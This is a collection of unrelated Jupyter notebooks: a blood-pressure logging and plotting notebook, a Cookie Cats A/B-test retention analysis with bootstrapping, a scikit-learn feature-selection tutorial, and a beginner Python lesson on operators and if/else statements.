DataReader.read_from_file(test_metadata_file, converters=converter_dict) test_other_columns_file = join(output_dir, '{}_test_other_columns.{}'.format(experiment_id, file_format)) if exists(test_other_columns_file): df_test_other_columns = DataReader.read_from_file(test_other_columns_file, converters=converter_dict) test_human_scores_file = join(output_dir, '{}_test_human_scores.{}'.format(experiment_id, file_format)) if exists(test_human_scores_file): df_test_human_scores = DataReader.read_from_file(test_human_scores_file, converters=converter_dict) test_excluded_file = join(output_dir, '{}_test_excluded_responses.{}'.format(experiment_id, file_format)) if exists(test_excluded_file): df_test_excluded = DataReader.read_from_file(test_excluded_file, converters=converter_dict) test_responses_with_excluded_flags_file = join(output_dir, '{}_test_responses_with_excluded_flags.{}'.format(experiment_id, file_format)) if exists(test_responses_with_excluded_flags_file): df_test_responses_with_excluded_flags = DataReader.read_from_file(test_responses_with_excluded_flags_file, converters=converter_dict) test_preproc_file = join(output_dir, '{}_test_preprocessed_features.{}'.format(experiment_id, file_format)) if exists(test_preproc_file): df_test_preproc = DataReader.read_from_file(test_preproc_file, converters=converter_dict) pred_preproc_file = join(output_dir, '{}_pred_processed.{}'.format(experiment_id, file_format)) if exists(pred_preproc_file): df_pred_preproc = DataReader.read_from_file(pred_preproc_file, converters=converter_dict) feature_file = join(output_dir, '{}_feature.{}'.format(experiment_id, file_format)) if exists(feature_file): df_features = DataReader.read_from_file(feature_file, converters=converter_dict) features_used = [c for c in df_features.feature.values] # compute the longest feature name: we'll need if for the plots longest_feature_name = max(map(len, features_used)) betas_file = join(output_dir, '{}_betas.{}'.format(experiment_id, file_format)) if 
exists(betas_file): df_betas = DataReader.read_from_file(betas_file) if exists(feature_subset_file): df_feature_subset_specs = DataReader.read_from_file(feature_subset_file) else: df_feature_subset_specs = None # check for continuous human scores in the evaluation set continuous_human_score = False if exists(pred_preproc_file): if not df_pred_preproc['sc1'].equals(np.round(df_pred_preproc['sc1'])): continuous_human_score = True ```
github_jupyter
``` import pandas as pd from matplotlib import pyplot as plt df = pd.DataFrame(columns=["time", "sys", "dia", "rate"], data=[ # [ "2018-12-27 04:19", 158, 80, 60 ], # [ "2018-12-27 04:20", 131, 80, 60 ], # 05 Jan 2018 [ "2019-01-05 19:00", 152, 69, 62 ], [ "2019-01-05 19:50", 156, 69, 64 ], [ "2019-01-05 20:43", 158, 71, 63 ], [ "2019-01-05 21:45", 150, 59, 62 ], [ "2019-01-05 23:00", 149, 74, 62 ], [ "2019-01-05 23:00", 161, 68, 61 ], [ "2019-01-05 23:30", 155, 76, 62 ], [ "2019-01-05 23:30", 148, 72, 64 ], [ "2019-01-06 00:14", 151, 76, 55 ], [ "2019-01-06 00:14", 150, 77, 64 ], [ "2019-01-06 00:55", 178, 79, 64 ], [ "2019-01-06 00:55", 170, 77, 67 ], [ "2019-01-06 01:41", 131, 61, 60 ], # auto [ "2019-01-06 06:22", 131, 80, 60 ], [ "2019-01-06 06:24", 152, 79, 58 ], [ "2019-01-06 07:35", 173, 77, 58 ], [ "2019-01-06 11:14", 156, 71, 57 ], [ "2019-01-06 11:33", 138, 74, 59 ], [ "2019-01-06 12:38", 136, 74, 63 ], [ "2019-01-06 13:30", 123, 61, 61 ], [ "2019-01-06 15:16", 119, 65, 64 ], [ "2019-01-06 16:05", 93, 60, 61 ], [ "2019-01-06 16:07", 123, 71, 61 ], [ "2019-01-06 18:10", 109, 61, 58 ], [ "2019-01-06 22:01", 136, 69, 62 ], [ "2019-01-07 00:06", 112, 73, 53 ], [ "2019-01-07 00:08", 114, 60, 62 ], [ "2019-01-07 00:50", 101, 59, 60 ], [ "2019-01-07 00:51", 125, 56, 62 ], [ "2019-01-07 04:02", 108, 65, 64 ], [ "2019-01-07 07:07", 110, 53, 61 ], [ "2019-01-07 07:08", 119, 59, 62 ], [ "2019-01-07 10:05", 135, 67, 58 ], [ "2019-01-07 11:32", 137, 66, 60 ], [ "2019-01-07 12:37", 108, 59, 58 ], [ "2019-01-07 14:07", 149, 76, 67 ], [ "2019-01-07 14:33", 148, 73, 64 ], [ "2019-01-07 14:49", 144, 72, 59 ], [ "2019-01-07 15:51", 158, 81, 62 ], [ "2019-01-07 16:16", 120, 87, 60 ], [ "2019-01-07 18:47", 134, 70, 63 ], [ "2019-01-07 19:38", 138, 68, 69 ], [ "2019-01-07 20:59", 128, 62, 62 ], [ "2019-01-07 22:04", 136, 70, 60 ], [ "2019-01-07 22:05", 136, 70, 60 ], [ "2019-01-07 22:06", 145, 66, 60 ], [ "2019-01-07 23:09", 169, 89, 63 ], [ "2019-01-07 23:33", 159, 84, 61 ], 
[ "2019-01-08 00:06", 155, 82, 61 ], [ "2019-01-08 01:59", 131, 73, 66 ], [ "2019-01-08 03:05", 117, 74, 68 ], [ "2019-01-08 03:06", 128, 72, 67 ], [ "2019-01-08 03:08", 141, 72, 66 ], [ "2019-01-08 03:09", 140, 75, 64 ], [ "2019-01-08 03:13", 150, 81, 64 ], [ "2019-01-08 04:44", 106, 65, 70 ], [ "2019-01-08 07:12", 154, 72, 62 ], [ "2019-01-08 07:14", 148, 78, 65 ], [ "2019-01-08 08:42", 145, 75, 68 ], [ "2019-01-08 10:19", 133, 76, 67 ], [ "2019-01-08 13:33", 149, 79, 64 ], [ "2019-01-08 16:53", 133, 70, 65 ], [ "2019-01-08 21:22", 144, 86, 58 ], [ "2019-01-09 03:15", 132, 70, 71 ], [ "2019-01-09 07:06", 115, 67, 70 ], [ "2019-01-09 11:26", 120, 70, 66 ], [ "2019-01-09 17:54", 144, 72, 70 ], [ "2019-01-09 19:20", 135, 65, 65 ], [ "2019-01-09 19:20", 135, 65, 65 ], [ "2019-01-10 00:23", 128, 70, 63 ], [ "2019-01-10 02:19", 108, 53, 61 ], [ "2019-01-10 06:50", 130, 67, 62 ], [ "2019-01-10 10:28", 138, 72, 63 ], # 10 jan [ "2019-01-10 13:35", 120, 62, 64 ], [ "2019-01-10 21:20", 134, 71, 65 ], # 11 jan [ "2019-01-11 00:55", 126, 71, 67 ], [ "2019-01-11 03:27", 101, 65, 65 ], [ "2019-01-11 07:08", 120, 69, 63 ], [ "2019-01-11 12:27", 112, 58, 62 ], [ "2019-01-11 15:08", 107, 62, 63 ], # 12 jan [ "2019-01-12 01:00", 100, 60, 71 ], [ "2019-01-12 07:10", 140, 69, 59 ], [ "2019-01-12 07:10", 132, 69, 57 ], [ "2019-01-12 10:10", 103, 65, 68 ], [ "2019-01-12 18:16", 111, 65, 61 ], [ "2019-01-12 22:10", 121, 75, 67 ], # 13 jan [ "2019-01-13 01:27", 130, 66, 63 ], [ "2019-01-13 05:36", 109, 62, 65 ], [ "2019-01-13 13:04", 137, 71, 66 ], # 14 jan [ "2019-01-14 01:19", 107, 62, 65 ], [ "2019-01-14 07:10", 97, 65, 63 ], [ "2019-01-14 10:50", 105, 62, 67 ], [ "2019-01-14 13:12", 128, 68, 64 ], # event: new treatment schedule [ "2019-01-14 15:06", 105, 53, 60 ], [ "2019-01-14 19:31", 129, 69, 63 ], [ "2019-01-14 21:06", 116, 62, 63 ], # 15 jan [ "2019-01-15 09:00", 117, 60, 64 ], [ "2019-01-15 12:00", 112, 58, 65 ], [ "2019-01-15 15:05", 100, 56, 67 ], [ "2019-01-15 18:05", 119, 
61, 65 ], [ "2019-01-15 21:00", 119, 62, 63 ], # 16 jan [ "2019-01-16 00:12", 125, 70, 61 ], [ "2019-01-16 00:28", 111, 65, 60 ], [ "2019-01-15 09:00", 133, 67, 60 ], [ "2019-01-15 12:00", 122, 59, 60 ], [ "2019-01-15 15:00", 111, 66, 64 ], [ "2019-01-15 18:00", 118, 68, 64 ], [ "2019-01-15 21:52", 119, 50, 61 ], # 17 Jan [ "2019-01-17 00:03", 109, 59, 64 ], [ "2019-01-17 03:00", 90, 55, 67 ], [ "2019-01-17 03:03", 109, 65, 63 ], [ "2019-01-17 09:18", 125, 65, 61 ], ]) df[0] = pd.to_datetime(df.time, format="%Y-%m-%d %H:%M:%S") df = df.set_index(0) # df = df.groupby(0).median() df = df.resample('30min').median().dropna() # df # df = df.rolling('1h').median() df.plot() # df.dropna() # type(df.set_index(0).index) # df['2019-01-09':] import matplotlib.cm as cm import numpy as np def plot_by_days(df): plt.figure(figsize=(8,4)) plt.grid() # print(df) groups = df.groupby(df.index.date) colors = cm.rainbow(np.linspace(0, 1, len(groups))) for c, (_, group) in zip(colors, groups): # plt.scatter(group.index.time, group[1], color=c, s=550, alpha=0.1 ) # plt.scatter(group.index.time, group[1], s=550, alpha=0.2 ) plt.scatter(group.index.time, group.sys, s=50, color=c ) plt.plot(group.index.time, group.sys, color=c, alpha=0.21, linewidth=3) # plt.plot(group.index.time, group[1] ) # to_plot = df #[25:65] to_plot = df['2019-01-10':] plot_by_days(to_plot) # to_plot from datetime import datetime # datetime(2018, 12, 31, 12, 0, 1).strftime("%Y-%m-%d %H:%M:%S") # print(df[1].describe()) # dir(df[1]) # df[1].quantile(0.95) import datetime nights = df[ (datetime.time(0,30) <= df.index.time) & (df.index.time <= datetime.time(2,30))] # print(nights[1].describe()) # print(nights[1].quantile(0.90)) nights.hist(); # TODO: # 1. Rolling mean over days # 2. 
Rolling std() over days def plot_range(label, df, resample='1d', rolling='1d', c='blue'): mean = df.resample(resample).mean().rolling(rolling).mean(); std = df.resample(resample).std().rolling(rolling).mean(); mins = df.resample(resample).min().rolling(rolling).mean(); maxes = df.resample(resample).max().rolling(rolling).mean(); # plt.figure(figsize=(16,8)) # plt.axes() plt.title(label=label) plt.grid() # plt.box() plt.plot(mean-std, c=c) plt.plot(mean+std, c=c) plt.plot(mins, c="light"+c) plt.plot(maxes, c="light" + c) # plt.plot(std) plt.figure(figsize=(16,8)) plt.subplot(221) plot_range('Sys', df.sys) plt.subplot(222) plot_range('Dia', df.dia) plt.subplot(223) plot_range('Pulse pressure', df.sys-df.dia) plt.subplot(224) plot_range('Rate', df.rate) plt.show() # plot_range(df.dia, c='green') # plot_range(df.rate) df.resample('1d').mean().plot(title="mean"); df.rolling('1d').std().rolling('1d').mean().plot(title="std"); nights.sys.hist(); plt.hist(df.sys); plt.hist(df.dia); # plt.show() ``` # TODO: 1. Embulance staff questions:: what's min/max pressure during the last week? 2. Refactor the whole notebook as a function, to make it posssible to analyze different data sets quickly (so to understand the benefits from different medical approaches, dozes, so on).. 3. A function like: ```python should_i_call_embulance_right_now(current_systolic, current_diastolic, current_heartrate) True/False ``` Also need to explain in the docs, probably, that an embulance in some countries is free (for instance in Russia) and what it does exactly (magnesium injection) and, in some countries, - pretty expensive (the US). ``` # 2019-01-14 - поменял расписание приёма таблеток ```
github_jupyter
## 1. Of cats and cookies <p><a href="https://www.facebook.com/cookiecatsgame">Cookie Cats</a> is a hugely popular mobile puzzle game developed by <a href="http://tactile.dk">Tactile Entertainment</a>. It's a classic "connect three"-style puzzle game where the player must connect tiles of the same color to clear the board and win the level. It also features singing cats. We're not kidding! Check out this short demo:</p> <p><a href="https://youtu.be/GaP5f0jVTWE"><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cookie_cats_video.jpeg" style="width: 500px"></a></p> <p>As players progress through the levels of the game, they will occasionally encounter gates that force them to wait a non-trivial amount of time or make an in-app purchase to progress. In addition to driving in-app purchases, these gates serve the important purpose of giving players an enforced break from playing the game, hopefully resulting in that the player's enjoyment of the game being increased and prolonged.</p> <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cc_gates.png" alt=""></p> <p>But where should the gates be placed? Initially the first gate was placed at level 30, but in this notebook we're going to analyze an AB-test where we moved the first gate in Cookie Cats from level 30 to level 40. In particular, we will look at the impact on player retention. But before we get to that, a key step before undertaking any analysis is understanding the data. So let's load it in and take a look!</p> ``` # Importing pandas import pandas as pd # Reading in the data df = pd.read_csv('datasets/cookie_cats.csv') # Showing the first few rows df.head() ``` ## 2. The AB-test data <p>The data we have is from 90,189 players that installed the game while the AB-test was running. 
The variables are:</p> <ul> <li><code>userid</code> - a unique number that identifies each player.</li> <li><code>version</code> - whether the player was put in the control group (<code>gate_30</code> - a gate at level 30) or the group with the moved gate (<code>gate_40</code> - a gate at level 40).</li> <li><code>sum_gamerounds</code> - the number of game rounds played by the player during the first 14 days after install.</li> <li><code>retention_1</code> - did the player come back and play <strong>1 day</strong> after installing?</li> <li><code>retention_7</code> - did the player come back and play <strong>7 days</strong> after installing?</li> </ul> <p>When a player installed the game, he or she was randomly assigned to either <code>gate_30</code> or <code>gate_40</code>. As a sanity check, let's see if there are roughly the same number of players in each AB group. </p> ``` # Counting the number of players in each AB group. df.groupby('version')['version'].count() df.head() ``` ## 3. The distribution of game rounds <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/mr_waffles_smiling.png" style="width:200px; float:left"> </p> <p>It looks like there is roughly the same number of players in each group, nice!</p> <p>The focus of this analysis will be on how the gate placement affects player retention, but just for fun: Let's plot the distribution of the number of game rounds players played during their first week playing the game.</p> ``` # This command makes plots appear in the notebook %matplotlib inline # Counting the number of players for each number of gamerounds plot_df = df.groupby('sum_gamerounds')['userid'].count() # Plotting the distribution of players that played 0 to 100 game rounds ax = plot_df.head(100).plot(x='sum_gamerounds', y='userid') ax.set_xlabel("sum_gamerounds") ax.set_ylabel("userid") ``` ## 4. 
Overall 1-day retention <p>In the plot above we can see that some players install the game but then never play it (0 game rounds), some players just play a couple of game rounds in their first week, and some get really hooked!</p> <p>What we want is for players to like the game and to get hooked. A common metric in the video gaming industry for how fun and engaging a game is <em>1-day retention</em>: The percentage of players that comes back and plays the game <em>one day</em> after they have installed it. The higher 1-day retention is, the easier it is to retain players and build a large player base. </p> <p>As a first step, let's look at what 1-day retention is overall.</p> ``` # The % of users that came back the day after they installed df['retention_1'].sum()/df['retention_1'].count() ``` ## 5. 1-day retention by AB-group <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/belle_cookie.png" style="width:200px; float:right"> </p> <p>So, a little less than half of the players come back one day after installing the game. Now that we have a benchmark, let's look at how 1-day retention differs between the two AB-groups.</p> ``` # Calculating 1-day retention for each AB-group df.groupby('version')['retention_1'].sum()/df.groupby('version')['retention_1'].count() ``` ## 6. Should we be confident in the difference? <p>It appears that there was a slight decrease in 1-day retention when the gate was moved to level 40 (44.2%) compared to the control when it was at level 30 (44.8%). It's a small change, but even small changes in retention can have a large impact. But while we are certain of the difference in the data, how certain should we be that a gate at level 40 will be worse in the future?</p> <p>There are a couple of ways we can get at the certainty of these retention numbers. Here we will use bootstrapping: We will repeatedly re-sample our dataset (with replacement) and calculate 1-day retention for those samples. 
The variation in 1-day retention will give us an indication of how uncertain the retention numbers are.</p> ``` # Creating an list with bootstrapped means for each AB-group boot_1d = [] for i in range(500): boot_mean = df.sample(frac=1, replace=True).groupby('version')['retention_1'].mean() boot_1d.append(boot_mean) # Transforming the list to a DataFrame boot_1d = pd.DataFrame(boot_1d) # A Kernel Density Estimate plot of the bootstrap distributions boot_1d.plot() ``` ## 7. Zooming in on the difference <p>These two distributions above represent the bootstrap uncertainty over what the underlying 1-day retention could be for the two AB-groups. Just eyeballing this plot, we can see that there seems to be some evidence of a difference, albeit small. Let's zoom in on the difference in 1-day retention</p> <p>(<em>Note that in this notebook we have limited the number of bootstrap replication to 500 to keep the calculations quick. In "production" we would likely increase this to a much larger number, say, 10 000.</em>)</p> ``` # Adding a column with the % difference between the two AB-groups boot_1d['diff'] = (boot_1d['gate_30'] - boot_1d['gate_40']) / boot_1d['gate_40'] * 100 # Ploting the bootstrap % difference ax = boot_1d['diff'].plot() ax.set_xlabel("Not bad not bad at all!") ``` ## 8. The probability of a difference <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/ziggy_smiling.png" style="width:200px; float:left"> </p> <p>From this chart, we can see that the most likely % difference is around 1% - 2%, and that most of the distribution is above 0%, in favor of a gate at level 30. But what is the <em>probability</em> that the difference is above 0%? Let's calculate that as well.</p> ``` # Calculating the probability that 1-day retention is greater when the gate is at level 30 prob = (boot_1d['diff'] > 0).sum() / len(boot_1d['diff']) # Pretty printing the probability print(prob) ``` ## 9. 
7-day retention by AB-group <p>The bootstrap analysis tells us that there is a high probability that 1-day retention is better when the gate is at level 30. However, since players have only been playing the game for one day, it is likely that most players haven't reached level 30 yet. That is, many players won't have been affected by the gate, even if it's as early as level 30. </p> <p>But after having played for a week, more players should have reached level 40, and therefore it makes sense to also look at 7-day retention. That is: What percentage of the people that installed the game also showed up a week later to play the game again.</p> <p>Let's start by calculating 7-day retention for the two AB-groups.</p> ``` # Calculating 7-day retention for both AB-groups df.groupby('version')['retention_7'].sum()/df.groupby('version')['retention_7'].count() ``` ## 10. Bootstrapping the difference again <p>Like with 1-day retention, we see that 7-day retention is slightly lower (18.2%) when the gate is at level 40 than when the gate is at level 30 (19.0%). This difference is also larger than for 1-day retention, presumably because more players have had time to hit the first gate. 
We also see that the <em>overall</em> 7-day retention is lower than the <em>overall</em> 1-day retention; fewer people play a game a week after installing than a day after installing.</p> <p>But as before, let's use bootstrap analysis to figure out how certain we should be of the difference between the AB-groups.</p> ``` # Creating a list with bootstrapped means for each AB-group boot_7d = [] for i in range(500): boot_mean = df.sample(frac=1, replace=True).groupby('version')['retention_7'].mean() boot_7d.append(boot_mean) # Transforming the list to a DataFrame boot_7d = pd.DataFrame(boot_7d) # Adding a column with the % difference between the two AB-groups boot_7d['diff'] = (boot_7d['gate_30'] - boot_7d['gate_40']) / boot_7d['gate_40'] * 100 # Ploting the bootstrap % difference ax = boot_7d['diff'].plot() ax.set_xlabel("% difference in means") # Calculating the probability that 7-day retention is greater when the gate is at level 30 prob = (boot_7d['diff'] > 0).sum() / len(boot_7d['diff']) # Pretty printing the probability print(prob) ``` ## 11. The conclusion <p>The bootstrap result tells us that there is strong evidence that 7-day retention is higher when the gate is at level 30 than when it is at level 40. The conclusion is: If we want to keep retention high — both 1-day and 7-day retention — we should <strong>not</strong> move the gate from level 30 to level 40. There are, of course, other metrics we could look at, like the number of game rounds played or how much in-game purchases are made by the two AB-groups. But retention <em>is</em> one of the most important metrics. If we don't retain our player base, it doesn't matter how much money they spend in-game.</p> <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cookie_yellow.png" style="width:100px; float:center"> </p> <p>So, why is retention higher when the gate is positioned earlier? 
One could expect the opposite: The later the obstacle, the longer people are going to engage with the game. But this is not what the data tells us. The theory of <em>hedonic adaptation</em> can give one explanation for this. In short, hedonic adaptation is the tendency for people to get less and less enjoyment out of a fun activity over time if that activity is undertaken continuously. By forcing players to take a break when they reach a gate, their enjoyment of the game is prolonged. But when the gate is moved to level 40, fewer players make it far enough, and they are more likely to quit the game because they simply got bored of it. </p> ``` # So, given the data and the bootstrap analysis # Should we move the gate from level 30 to level 40 ? move_to_level_40 = False # True or False ? ```
github_jupyter
# Feature Selection * ` skelearn.feaeture_selection ` module can be used for feature selection / dimensionality reduction. * This helps to imporve the accuracy score or performance while dealing with large dimensional data. https://scikit-learn.org/stable/modules/feature_selection.html ## Removing features with low variance * Variance thresholding method can be used to remove features having low variance. * Set a particular variance threshold for a given attribute. * ` VarianceThreshold ` will remove the column having variance less than the given threshold. * By default ` VarianceThreshold ` removes the columns having zero variance. ``` from sklearn.feature_selection import VarianceThreshold X = [[0,0,1], [0,1,0], [1,0,0], [0,1,1], [0,1,0], [0,1,1]] sel = VarianceThreshold(threshold = 0.16) sel.fit_transform(X) ``` ## Univariate Feature Selection * Univariate Feature Selection works by considering statistical tests. * It is prepreocessing step before estimator * Use the ` SelectBest ` and apply ` fit_transform ` * ` Select_best ` removes all the ` k ` highest scoring features * ` SelectPercentile ` removes all but a user-specified highest scoring percentage of feature. 
* Using common univariate statistical tests for each feature: false positive rate ` SelectFpr `, false discovery rate ` SelectFdr `, or famaily wise error ` SelectFwe ` * Let us perform $ \chi^2 $ test to the samples to retrieve only the two best features ``` from sklearn.datasets import load_iris from sklearn.feature_selection import SelectKBest from sklearn.feature_selection import chi2 iris = load_iris() X, y = iris.data, iris.target print(X.shape) SB = SelectKBest(chi2, k=2) X_new = SB.fit_transform(X,y) print(X_new.shape) ``` * These objects take input a scoring function and return univariate scores or p-values * Some guidelines: - * For regresiion: - `f_regrssion` , ` mutual_info_regression ` * For classification: - ` chi2 ` , ` f_classif `, ` mutual_info_classif ` * The methods based on F-test estimate the degree of linear dependency between two random varaibles. * Mututal information methods can capture any kind of statistical dependency, but they are non parametric and require more samples for accurate estimation ## Recursive Feature Elimination * Given an external estimator that assigns weights to features, recursive feature elimination is to select features by recursively considering smaller and smaller sets of features. * First, the estimator is trained on the inital set of features and the importance of the features is obtained using the ` coef_ ` method or through the ` feature_importances_ ` attribute. * Then, the least important features are pruned from current set of features. * This procedure is repeated on the pruned set unitil the desired number of features to be selected are eventually reached. ### E.g. 
Recursive feature elimination ``` from sklearn.datasets import make_friedman1 from sklearn.feature_selection import RFE from sklearn.svm import SVR X,y = make_friedman1(n_samples = 50, n_features=10, random_state = 0) estimator = SVR(kernel = 'linear') print(X.shape) # The classifier must support the coef_ or feature_importances_ attributes # Estimator denotes the estimator which we are using # n_feaures denotes the maximum number of features that we are want to choose # step denotes the amount of features to be removed at end of every iteration selector = RFE(estimator, n_features_to_select= 5, step=1) selector = selector.fit(X,y) # Use selector.support_ do display the mask of features, that is which features were selected print(selector.support_) # Use selectior.ranking_ to correspond to the ranking of the ith position of the feature # Best features are ranked as 1 print(selector.ranking_) ``` ### E.g. Recursive feature elimination using cross-validation Feature ranking using cross-validation selection of best number of features ``` from sklearn.datasets import make_friedman1 from sklearn.feature_selection import RFECV from sklearn.svm import SVR X, y = make_friedman1(n_samples = 50, n_features = 10, random_state=0) estimator = SVR(kernel = 'linear') # cv denotes number of times we do cross_validation selector = RFECV(estimator, min_features_to_select=5, cv = 5) selector = selector.fit(X,y) selector.support_ selector.ranking_ ``` ## Feature selection using SelectFromModel * ` SelectFromModel ` is a meta-transformer that helps can be used with any estimator having ` coef_ ` or ` features_importance_ ` attribute after fitting. * The features are considered unimportant are removed, if the corresponding `coef_` or ` features_importance_ ` values are below the providied ` threshold ` parameter. * Apart from specifying the threshold numerically, there are built-in hueristics for finding for finding a threshold using a string argument such as "mean", "mode" or "median". 
### L1-based feature Selection * Linear models penalized with L1 norm have sparse solutions. * When the goal is to reduce the dimensionality of the data to use with another classifier then they can be used along with the ` feature_selection.SelectFromModel ` to select the non-zero coefficients. * In particular, sparse estimators useful for this purpose are the 1 ` linear_model.Lasso ` for regression, and of ` linear_model.LogisticRegression `and ` svm.LinearSVC ` for classification ``` from sklearn.svm import LinearSVC from sklearn.datasets import load_iris from sklearn.feature_selection import SelectFromModel iris = load_iris() X,y = iris.data, iris.target print(X.shape) lsvc = LinearSVC(C = 0.01, penalty = "l1", dual = False, max_iter = 2500) lsvc = lsvc.fit(X,y) # Estimator contains the name of estimator we are trying to fit # Whether a prefit model is expected to be passed into the constructor directly or not. # If True, transform must be called directly and SelectFromModel cannot be used with cross_val_score, # GridSearchCV and similar utilities that clone the estimator. # Otherwise train the model using fit and then transform to do feature selection. model = SelectFromModel(lsvc, prefit = True) X_new = model.transform(X) print(X_new.shape) ``` * With SVMs and logistic-regression, the parameter C controls the sparsity: the smaller C the fewer features selected. * With Lasso, the higher the alpha parameter, the fewer features selected. 
### Tree-based feature Selection * Tree-based estimator can be used to compute the feature importances which in turn can be used to dicared the irrelevant features ``` from sklearn.ensemble import RandomForestClassifier from sklearn.datasets import load_iris from sklearn.feature_selection import SelectFromModel iris = load_iris() X, y = iris.data, iris.target print(X.shape) clf = RandomForestClassifier(n_estimators=100, n_jobs = -1, random_state=0) clf = clf.fit(X,y) clf.feature_importances_ model = SelectFromModel(clf, threshold = 0.3, prefit = True) X_new = model.transform(X) print(X_new.shape) ``` ## Feature Selection as Part of ML Pipeline * Feature selection is usually used as a prepreocessing step before doing actual learning. * Recommended way to do this is use ` sklearn.pipeline.Pipeline ` ``` from sklearn.pipeline import Pipeline clf = Pipeline([ ('feature_selection', SelectFromModel(LinearSVC(max_iter = 8000))), ('classification', RandomForestClassifier(n_estimators = 100)) ]) clf = clf.fit(X,y) ``` * In this snippet we make use of `sklearn.svm.LinearSVC` with ` SelectfromModel `. * ` SelectfromModel ` selects the important feature and passes it to `RandomForestClassifier`. * `RandomForestClassifer` trains only on the relevant input given by the pipeline
github_jupyter
# <center>Python Basics<center/> <img height="60" width="120" src="https://www.python.org/static/img/python-logo-large.png?1414305901"></img> # Table of contents <br/> <a href = "#12.-Operators">12. Operators</a><br/> 1. Arithmetic operators 2. Comparison (Relational) operators 3. Logical (Boolean) operators 4. Bitwise operators 5. Assignment operators 6. Special operators <a href = "#13.-Control-Flow">13. Control Flow</a><br/> 1. if..else 2. while 3. for 4. break & continue # 12. Operators Operators are the constructs which can help manipulate the value of operands.<br/> Consider the expression 4 + 5 = 9. Here, <i><b>4 and 5</b></i> are called <i><b>operands</b></i> and <i><b>+</b></i> is called <i><b>operator</b></i>. ## Operator Types The different operators in Python are as below 1. Arithmetic operators 2. Comparison (Relational) operators 3. Logical (Boolean) operators 4. Bitwise operators 5. Assignment operators 6. Special operators Let us discuss them one by one ## 12.1 Arithmetic Operators Arithmetic operators are used to perform mathematical operations like addition, subtraction, multiplication etc. + , -, *, /, %, //, ** are arithmetic operators Example: ``` variable1, variable2 = 5, 2 print(variable1 + variable2) # Addition(+) print(variable1 - variable2) # Subtraction(-) print(variable1 * variable2) # Multiplication(*) print(variable1 / variable2) # Division(/) print(variable1 % variable2) # Modulo division (%) print(variable1 // variable2) # Floor Division (//) print(variable1 ** variable2) # Exponent (**) ``` ## 12.2 Comparision Operators Comparison operators are used to compare values. It either returns True or False according to the condition. 
>, <, ==, !=, >=, <= are comparison operators
=, +=, -=, *=, /=, %=, //=, **=, &=, |=, ^=, >>=, <<= are Assignment operators ``` age = 40 age += 4 # Add AND <- age = age + 4 print(age) age -= 7 # Subtract AND (-=) print(age) age *= 4 # Multiply AND (*=) print(age) age /= 4 # Divide AND (/=) print(age) age %= 20 # Modulus AND (%=) print(age) age //= 4 # Floor Division (//=) print(age) age **= 4 # Exponent AND (**=) print(age) ``` ## 12.6 Special Operators ### 12.6.1 Identity Operators **is and is not** are the <u>identity operators</u> in Python. They are used to verify if two values (or variables) are located in the same part of the memory. ``` variable1 = 20 variable2 = 20 print(variable1 is variable2) # 20 is created once & both variable1 and variable2 points to same object #check is not print(variable1 is not variable2) myList1 = [1,2,3] myList2 = [1,2,3] print(myList1 is myList2) myString1 = "Suchit" myString2 = "Suchit" print(myString1 is not myString2) ``` ### 12.6.2 MemberShip Operators **in and not in** are the membership operators in Python. They are used to test whether a value or variable is found in a sequence (string, list, tuple, set and dictionary). ``` myList3 = ['a', 22, 'b', 100] print(22 in myList3) # Check if 22 is present in the given list or not print('b' in myList3) # Check if 'b' is present in the given list myDictionary = {125 : 'Apple', 200 : 'Banana'} print(125 in myDictionary) ``` # 13. 
Control Flow ## 13.1 Python if - else Statement If - else statements are used for **decision making**, let us see a simple examle, if 'It rains':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> else: <br/> &nbsp;&nbsp;&nbsp;&nbsp;if 'It is too hot':<br/> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> &nbsp;&nbsp;&nbsp;&nbsp;else:<br/> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Play golf'<br/> --- **else if** can be combined to form **elif** if 'It rains':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> elif 'It is too hot':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> else:<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Play golf'<br/> --- ### 13.1.1 Let us see the Python Syntax for if statement<br/><br/> if test expression: statement(s) --- <br/><br/> The program evaluates the test expression and will execute statement(s) only if the text expression is True. If the text expression is False, the statement(s) is not executed. Python interprets non-zero values as True. None and 0 are interpreted as False. --- #### Flow Chart on how if-statement helps in Decision Making <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/Python_if_statement.jpg?raw=true"></img> #### Examples of if-statement ``` number = 20 if number<15: print('Number is less than 15') print('Outside if block') # try 0, -1 and None if -1: print("Inside if") print("Outside if") #This print statement always print # What is the idea behind the above val = -1 print(bool(val)) ``` --- ### 13.1.2 Python if...else - Statement Syntax of if ... 
else statement is as follows if test expression: Body of if else: Body of else ### Flow Chart on how if...else-statement helps in Decision Making <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/flowchart-if-else-programming.jpg?raw=true"></img> #### Examples of if...else-statement ``` age = 21 if age > 18: print('Adult') else: print('Child') ``` --- ### 13.1.3 if..elif..else Statement The syntax for **if..elif..else** Statement is as follows if test expression: Body of if elif test expression: Body of elif else: Body of else #### Flow Chart on how if..elif..else-statement helps in Decision Making <img height="200" width="500" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/python_ifelseif.jpg?raw=true"></img> ``` age = 20 if age > 19: print('Adult') elif age > 12: print('Teen') else: print('Child') ``` --- ### 13.1.4 Nested if Statements We can have a if...elif...else statement inside another if...elif...else statement. This is called nesting in computer programming. Any number of these statements can be nested inside one another. Indentation is the only way to figure out the level of nesting. This can get confusing, so must be avoided if we can. #### Example of <b>Nested if</b> statements ``` age = 14 if age >=13: if age <=19: print('Teen') else: print('Adult') else: print('Child') print('This will always get executed') ``` Combining **Operators** in if-statements ``` age = 1 person_type = 'not sure' if (age >= 13) and (age<=19): # Using the logical operator : and person_type = 'Teen' elif (age >= 0) and (age <=12): person_type = 'Child' else: person_type = 'Adult' print('The person is in category: {}'.format(person_type)) ``` --- # 13.2 <u>while</u> 